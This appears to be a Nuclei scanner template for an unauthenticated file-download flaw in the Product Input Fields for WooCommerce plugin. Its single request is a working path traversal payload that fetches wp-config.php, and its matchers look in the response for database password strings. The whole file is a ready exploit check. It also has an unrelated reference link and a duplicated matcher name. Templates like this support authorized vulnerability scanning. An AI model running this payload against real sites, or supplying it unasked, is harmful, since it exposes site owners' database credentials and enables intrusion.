id: wp-woocommerce-file-download

info:
  name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
  author: 0x0xporn
  severity: high
  description: |
    WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
  reference: https://neal.fun/
  tags: wordpress,woocommerce,lfi,wp-plugin,wp

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'

    matchers-condition: or
    matchers:
      - type: dsl
        name: dbpass
        dsl:
        - status_code==200 && contains(body,"DB_PASSWORD")

      - type: dsl
        name: pass
        dsl:
        - status_code==200 && contains(body,"DB_PASS")

      - type: dsl
        name: passwd
        dsl:
        - status_code==200 && contains(body,"PASSWD")

      - type: dsl
        name: passwd
        dsl:
        - status_code==200 && contains(body,"db_pwd")
    